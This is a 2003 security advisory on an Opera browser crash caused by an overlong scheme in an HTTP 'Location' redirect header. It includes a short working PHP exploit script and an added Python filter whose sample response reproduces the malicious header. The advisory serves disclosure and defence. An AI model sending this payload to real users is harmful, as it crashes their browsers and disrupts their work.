Opera Browser 'Location' Header Flaw Lets Remote Users Crash the Browser
SecurityTracker Alert ID: 1007319
CVE Reference: GENERIC-MAP-NOMATCH
Date: Jul 28 2003
Impact: Denial of service via network
Exploit Included: Yes
Version(s): 6.12, 7.0
Description: A denial of service vulnerability was reported in the Opera web browser in the processing of redirect URLs. A remote user can cause the target user's browser to crash.
dodo (https://www.darkwired.org/) reported that a remote user can send an HTTP response that includes a specially crafted 'Location' redirect header. When the HTTP response is loaded by the target user, the target user's browser will crash, according to the report.
A demonstration exploit PHP script is provided:
<?php
for($i=0; 20000+10000>$i; $i++) $prot.="A";
header("Location: $prot://dd");
?>
Impact: A remote user can create an HTTP response that will crash the browser.
Solution: No solution was available at the time of this entry.
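With no fix listed, a filtering proxy or IDS rule in front of the browser is one place to stop such a response. The following is an added example, not part of the original advisory or the reporter's script: it flags 'Location' values whose URI scheme is overlong or malformed. The length limits, function names and sample response are assumptions constructed for illustration.

```python
import re

# Assumed policy limits (not from the advisory); tune for your environment.
MAX_SCHEME_LEN = 32
MAX_LOCATION_LEN = 8192
# RFC 3986 scheme grammar: ALPHA *( ALPHA / DIGIT / "+" / "-" / "." )
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*$")
# Constructed sample: a redirect shaped like the one the advisory describes.
SAMPLE = b"HTTP/1.1 302 Found\r\nLocation: " + b"A" * 30000 + b"://dd\r\n\r\n"


def location_values(raw_headers):
    """Return every Location value in a raw header block, unfolding obs-fold lines."""
    lines = []
    for line in re.split(r"\r?\n", raw_headers.decode("latin-1")):
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()  # continuation of the previous header
        else:
            lines.append(line)
    values = []
    for line in lines:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "location":
            values.append(value.strip())
    return values


def check_location(value):
    """Return the reasons a Location value should be rejected (empty list = acceptable)."""
    reasons = []
    if len(value) > MAX_LOCATION_LEN:
        reasons.append("location-too-long")
    # Only the part before the first '/', '?' or '#' can hold a scheme.
    head = re.split(r"[/?#]", value, maxsplit=1)[0]
    if ":" in head:
        scheme = head.split(":", 1)[0]
        if len(scheme) > MAX_SCHEME_LEN:
            reasons.append("scheme-too-long")
        if not SCHEME_RE.match(scheme):
            reasons.append("scheme-malformed")
    return reasons


def inspect_response(raw_headers):
    """Map each rejected Location value (truncated to 40 chars) to its reasons."""
    checked = ((v, check_location(v)) for v in location_values(raw_headers))
    return {v[:40]: r for v, r in checked if r}
```

A proxy would drop or rewrite any response for which `inspect_response` returns a non-empty result before it reaches the browser.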
Vendor URL: www.opera.com/
Cause: Not specified
Underlying OS: BeOS, Linux (Any), MacOS, QNX, UNIX (FreeBSD), UNIX (OS X), UNIX (Solaris - SunOS), Windows (Any)
Underlying OS Comments: Confirmed on Slackware Linux
Message History:
None.